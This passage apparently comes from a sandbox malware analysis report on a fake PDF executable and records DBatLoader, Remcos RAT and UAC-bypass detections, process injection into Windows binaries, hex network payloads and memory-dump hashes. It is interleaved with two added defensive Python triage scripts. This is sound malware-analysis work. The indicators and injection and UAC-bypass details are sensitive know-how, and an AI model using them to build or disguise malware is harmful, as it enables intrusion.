d1 70 e2 e2 b2 9a b1 aa 4e c2 c1 55 ab 3a 7d f2
                                Data Ascii: s18grd5EE9<r~F[~pfrD,tQ\yl;}7W@@1EE3,{DS=6>vtd~)oW@|!<?pogo4fDE`6c*+|<xg.^2.DIQa<5GZ'W\a9k+&jPN,`pNU:}
                                2022-06-26 07:43:17 UTC863INData Raw: f0 55 d2 a4 ba 6b 88 7a 67 59 ec f4 69 5a df e8 0c 85 d7 4d 37 55 73 9e 36 93 19 0a 7f d4 b1 a8 22 fb ef cd a0 75 bd cd 1d 94 1d 67 6d 63 91 97 7a 0d 8c 33 45 45 48 94 e3 ad 35 76 a1 9c 8e cc 68 76 11 f6 1d 89 1b 8a 9a c7 2d 5b 3f db 49 21 02 20 9d 75 1e b7 87 55 bd e4 da 4b b3 8a aa 23 ab 36 68 4e fd 5c 74 d8 a1 e6 36 36 51 75 58 9f 0a 77 29 0d c0 b0 11 6a ba 3e 26 69 8d 7f 4c 68 72 ca 61 44 92 22 81 6d f2 01 5e 82 88 13 cb f2 e7 91 c4 d0 6f dd 7a 9c 6f b6 53 40 61 8f 79 85 dd c9 fa 9e 3b 9d 11 32 87 45 60 3c 84 30 1d fd b1 77 21 9d 6c f3 3b 80 75 a0 60 d1 fc c0 3f 94 58 d2 f9 01 4e 5a 04 b5 36 32 72 01 9b 9b b9 60 61 c2 97 bc e7 db 38 f8 f7 35 49 fa e5 91 06 9d 9d a1 95 28 0f c4 61 04 95 00 a9 00 c9 57 d3 13 a5 bd 7f 3c 08 4c b9 c8 58 ea 58 7c 64 29 20
                                Data Ascii: UkzgYiZM7Us6"ugmcz3EEH5vhv-[?I! uUK#6hN\t66QuXw)j>&iLhraD"m^ozoS@ay;2E`<0w!l;u`?XNZ62r`a85I(aW<LXX|d)
                                2022-06-26 07:43:17 UTC879INData Raw: 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 3c 85 8d 75 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73
                                Data Ascii: wUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ<uuii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s
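The payload chunks above are shown as raw hex with a lossy ASCII rendering, which makes it hard to see that the last chunk of this stream has a very different shape from the ones before it. A per-chunk byte-entropy check separates random-looking data (what an encrypted RAT channel normally carries) from structured or repetitive data that deserves a closer look. The script below is an added example and not part of the Joe Sandbox report: the two hex strings are copied verbatim from the first and last "Data Raw" lines of this stream, and the entropy thresholds are the editor's assumptions, not values the report provides.

```python
"""Entropy triage of the TCP payload chunks listed in the report.

Added example (not part of the Joe Sandbox report). The two chunks below are
copied from the report's "Data Raw" lines; bytes.fromhex() skips whitespace.
The thresholds are assumptions chosen for this illustration.
"""
from __future__ import annotations

import math
from collections import Counter

# Constructed input: first "Data Raw" chunk of the 07:43:17 UTC stream.
CHUNK_FIRST = bytes.fromhex("""
27 6e 93 54 d4 30 ac 64 c7 ca 2e 58 c5 19 3e ca b6 d4 71 f7 89 de ef 13 52 5c dc 4f 3d 8a 53 e9
04 f5 9e be 71 7f 24 de 47 73 1b 1f 5c 1a cc ba 30 fa 78 dc 7c b2 9c 3d 36 11 d8 22 e2 7e 3f 47
b9 68 80 b5 9a 85 8b b8 d1 e2 3b 24 28 68 d9 d1 c8 a0 64 5b 0d f2 61 f9 18 d0 cb 60 44 b6 2b b8
d9 d0 17 c5 e2 b9 db 77 17 9b 2f f2 27 3f 02 e7 ca b5 21 11 6a 61 cb f8 54 bc 2a 61 ca b2 68 02
8f 39 34 a0 11 6a 47 64 4c 72 b3 3f 6d cc 00 0c a8 34 5c 6b 47 55 ee 9d c7 5e a3 73 86 82 20 a6
ba 6b 1c bd 6d d0 6d a1 10 49 f3 63 ef 40 f9 67 7e 44 6b f1 9d 66 d8 39 8b 2c 8d 06 64 de c5 4d
a1 ae d0 1d 4c e8 be 69 c4 7e 88 de 43 fe a0 90 e0 fc d4 eb fb 18 e4 f3 69 a2 2a a4 61 8d cc 31
22 c2 24 19 05 22 d7 c1 7e c1 77 10 43 fc 9e 3c e2 b7 d0 22 32 63 51 08 38 58 4e 50 c2 02 3c
""")

# Constructed input: last "Data Raw" chunk of the same stream, laid out one
# repetition per line so the period is visible (the 4th and 6th lines lack the 0x85 byte).
CHUNK_LAST = bytes.fromhex("""
77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a
77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a
77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a
77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a
77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 3c 85 8d 75 75
1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22
75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22
75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22
75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22
75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73
""")

HIGH_ENTROPY = 6.5  # assumption: at or above this a ~256-byte chunk looks encrypted/compressed
LOW_ENTROPY = 5.5   # assumption: at or below this a chunk is structured or repetitive


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the maximum and needs a uniform byte histogram."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def distinct_bytes(data: bytes) -> int:
    """Distinct byte values seen; ~256 random bytes typically show around 160."""
    return len(set(data))


def classify(data: bytes) -> str:
    """Bucket a chunk as 'random-like', 'structured' or 'indeterminate'."""
    h = shannon_entropy(data)
    if h >= HIGH_ENTROPY:
        return "random-like"
    if h <= LOW_ENTROPY:
        return "structured"
    return "indeterminate"


def triage(chunks: dict[str, bytes]) -> dict[str, dict]:
    """Per-chunk summary; the analyst decides which bucket to inspect first."""
    return {
        name: {
            "length": len(data),
            "entropy": round(shannon_entropy(data), 2),
            "distinct": distinct_bytes(data),
            "verdict": classify(data),
        }
        for name, data in chunks.items()
    }


if __name__ == "__main__":
    for name, row in triage({"first": CHUNK_FIRST, "last": CHUNK_LAST}).items():
        print(f"{name:>5}: {row}")
```

Run over the two chunks, the first lands in the random-like bucket and the last in the structured one with only 24 distinct byte values; the same loop can be pointed at every "Data Raw" line of a stream to find where the channel changes character.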


                                Target ID:0
                                Start time:09:42:42
                                Start date:26/06/2022
                                Path:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe"
                                Imagebase:0x400000
                                File size:901632 bytes
                                MD5 hash:8E60C68E832622B0EBD88A612898A9F9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.315120211.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.306973875.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.316837700.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.315970483.0000000003AEC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.317153227.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.312930120.0000000003050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.315787933.0000000003968000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000000.259960102.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:low

                                Target ID:3
                                Start time:09:42:57
                                Start date:26/06/2022
                                Path:C:\Windows\SysWOW64\logagent.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\logagent.exe
                                Imagebase:0xea0000
                                File size:86016 bytes
                                MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                Reputation:moderate

                                Target ID:8
                                Start time:09:43:06
                                Start date:26/06/2022
                                Path:C:\Users\Public\Libraries\Eluiezilfw.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\Public\Libraries\Eluiezilfw.exe"
                                Imagebase:0x400000
                                File size:901632 bytes
                                MD5 hash:8E60C68E832622B0EBD88A612898A9F9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.344209783.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000008.00000002.348456214.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.346405704.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.349121751.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000000.309996740.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000008.00000002.347895283.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.349277729.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Eluiezilfw.exe, Author: Joe Security
                                Antivirus matches:
                                • Detection: 22%, ReversingLabs
                                Reputation:low

                                Target ID:13
                                Start time:09:43:14
                                Start date:26/06/2022
                                Path:C:\Users\Public\Libraries\Eluiezilfw.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\Public\Libraries\Eluiezilfw.exe"
                                Imagebase:0x400000
                                File size:901632 bytes
                                MD5 hash:8E60C68E832622B0EBD88A612898A9F9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.360030568.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000000.326994994.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.361029837.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.360948526.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.358808877.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000D.00000002.360606462.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000D.00000002.360296603.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000D.00000002.360448965.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low

                                Target ID:14
                                Start time:09:43:14
                                Start date:26/06/2022
                                Path:C:\Windows\SysWOW64\logagent.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\logagent.exe
                                Imagebase:0xea0000
                                File size:86016 bytes
                                MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                Reputation:moderate

                                Target ID:15
                                Start time:09:43:25
                                Start date:26/06/2022
                                Path:C:\Windows\SysWOW64\DpiScaling.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\DpiScaling.exe
                                Imagebase:0x1040000
                                File size:77312 bytes
                                MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                Reputation:moderate
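Each Yara match in the process records above names a memory dump whose filename encodes the process ID, the region's base address, its page protection and its memory type. Read together with the process record, those fields are what turn a list of rule hits into an injection finding: logagent.exe and DpiScaling.exe are Windows system binaries loaded at their own image bases, yet the Remcos rules fire in PAGE_EXECUTE_READWRITE private regions at 0x400000 and 0x10540000 inside them, while the two Eluiezilfw.exe processes only show DBatLoader hits in their own image and in read/write heap memory. The script below is an added example and not part of the Joe Sandbox report or its tooling. The field layout of the .sdmp name is inferred from the entries on this page and is an assumption (PID . stage . counter . base . protection . unknown . type . unknown); the two fields marked unknown are not interpreted. The process records are a hand-copied subset of the ones listed above.

```python
"""Decode the .sdmp names behind the Yara matches and flag injection indicators.

Added example, not part of the Joe Sandbox report or its tooling. The dump-name
layout below is inferred from this report's entries and is an ASSUMPTION:
    PID.stage.counter.base.protect.<unknown>.type.<unknown>.sdmp
The process records are a hand-copied subset of the report's process table.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Win32 constants as found in MEMORY_BASIC_INFORMATION.Protect and .Type.
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Rules from the report that identify the final payload rather than the loader.
PAYLOAD_RULES = {"JoeSecurity_Remcos", "Remcos_1", "REMCOS_RAT_variants"}

_DUMP_RE = re.compile(
    r"^(?P<pid>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.\d+\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.[0-9a-f]{8}\."
    r"(?P<type>[0-9a-f]{8})\.[0-9a-f]{8}\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Region:
    pid: int
    base: int
    protect: int
    mem_type: int


def parse_dump_name(source: str) -> Optional[Region]:
    """Return a Region for an .sdmp source; None for on-disk file sources."""
    m = _DUMP_RE.match(source)
    if not m:
        return None
    return Region(int(m["pid"], 16), int(m["base"], 16),
                  int(m["protect"], 16), int(m["type"], 16))


def injection_indicators(proc: dict) -> list[str]:
    """One finding per RWX private region of this process that a payload rule hit."""
    findings: list[str] = []
    system_binary = proc["path"].lower().startswith(SYSTEM_DIRS)
    seen: set[tuple[int, int, int]] = set()
    for rule, source in proc["yara"]:
        region = parse_dump_name(source)
        if region is None or rule not in PAYLOAD_RULES:
            continue
        key = (region.base, region.protect, region.mem_type)
        if key in seen:          # several rules usually hit the same dump
            continue
        seen.add(key)
        if region.protect == PAGE_EXECUTE_READWRITE and region.mem_type == MEM_PRIVATE:
            note = f"pid {region.pid}: {rule} in RWX private memory at 0x{region.base:x}"
            if system_binary:
                note += f" inside system binary {proc['path']}"
            if region.base != proc["imagebase"]:
                # A payload mapped at a base other than the loaded image's own.
                note += f" (process image base is 0x{proc['imagebase']:x})"
            findings.append(note)
    return findings


# Constructed input: a subset of the report's process records, copied by hand.
PROCESSES = [
    {
        "id": 3,
        "path": r"C:\Windows\SysWOW64\logagent.exe",
        "imagebase": 0xEA0000,
        "yara": [
            ("JoeSecurity_Remcos", "00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp"),
            ("Remcos_1", "00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp"),
            ("JoeSecurity_Remcos", "00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp"),
            ("JoeSecurity_Remcos", "00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp"),
        ],
    },
    {
        "id": 8,
        "path": r"C:\Users\Public\Libraries\Eluiezilfw.exe",
        "imagebase": 0x400000,
        "yara": [
            ("JoeSecurity_DBatLoader", "00000008.00000002.344209783.0000000000401000.00000020.00000001.01000000.00000005.sdmp"),
            ("JoeSecurity_DBatLoader", "00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp"),
            ("JoeSecurity_DBatLoader", r"C:\Users\Public\Libraries\Eluiezilfw.exe"),
        ],
    },
]

if __name__ == "__main__":
    for proc in PROCESSES:
        for line in injection_indicators(proc) or [f"pid {proc['id']}: no RWX payload regions"]:
            print(line)
```

For the logagent.exe record this yields two findings, one per RWX private region, and nothing for the dropped loader copy, whose hits are confined to its own image (PAGE_EXECUTE_READ, MEM_IMAGE) and to read/write heap memory; the on-disk file source is skipped rather than mis-parsed.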

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.279439053.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                  • Associated: 00000000.00000003.269771326.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_36e0000_Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !$%
                                  • API String ID: 0-2082652196
                                  • Opcode ID: 21e73f660005ec1a14e86006ef494f4aba2c2e3be36f415ba3b1b11f4bc42649
                                  • Instruction ID: 7af1a916b25e7d95dd29cccff067783bc6f7933c3dc3e9cb7bac5fc167adba8a
                                  • Opcode Fuzzy Hash: 21e73f660005ec1a14e86006ef494f4aba2c2e3be36f415ba3b1b11f4bc42649
                                  • Instruction Fuzzy Hash: B3A3816544E3D18FC7538BB48DA16803FB1AE1B26475E05DBC080CF5B3E2AD695ADB23
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.279439053.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                  • Associated: 00000000.00000003.269771326.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_36e0000_Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !$%
                                  • API String ID: 0-2082652196
                                  • Opcode ID: 167d50453b38688b3c72e9f1fc1a373a5e03a55b5a81dd43731d00c8152db099
                                  • Instruction ID: 8074240ec7649543ec473ac3744343f97f0bb6e37cf65cc1a2675c992c0cf464
                                  • Opcode Fuzzy Hash: 167d50453b38688b3c72e9f1fc1a373a5e03a55b5a81dd43731d00c8152db099
                                  • Instruction Fuzzy Hash: CEA3816544E3D18FC7538BB48DA16803FB1AE1B26475E05DBC080CF5B3E2AD695ADB23
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000003.269771326.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                  • Associated: 00000000.00000003.279439053.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_36e0000_Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 4f2c4fb839994718c9557afcb9db90ac30e81c9e04832298544c187920f8cae8
                                  • Instruction ID: 81519c8bec72dc1aa20fe9d50f5498c3fe7bf468ea2674f41dc26077510c9b24
                                  • Opcode Fuzzy Hash: 4f2c4fb839994718c9557afcb9db90ac30e81c9e04832298544c187920f8cae8
                                  • Instruction Fuzzy Hash: F6516773D29B51CFDB12CF34C94A2CA7BB0FE213117588AAED89186105D734D119CB8B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000003.278534199.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_3_38d0000_Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39be055803cf8deaa203db0f9e540671e7351c1fa794598f24cc39a6f5ebdd18
                                  • Instruction ID: 3af60aad8493b4b496345f829ea901592c5e633cd19ecac93745adae3d3676b0
                                  • Opcode Fuzzy Hash: 39be055803cf8deaa203db0f9e540671e7351c1fa794598f24cc39a6f5ebdd18
                                  • Instruction Fuzzy Hash: 6A31CF62818641CED317AF75CE96696FF79FB267643284B98C0C2CF4ABD325C042CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:6%
                                  Dynamic/Decrypted Code Coverage:97.2%
                                  Signature Coverage:21.8%
                                  Total number of Nodes:1750
                                  Total number of Limit Nodes:50

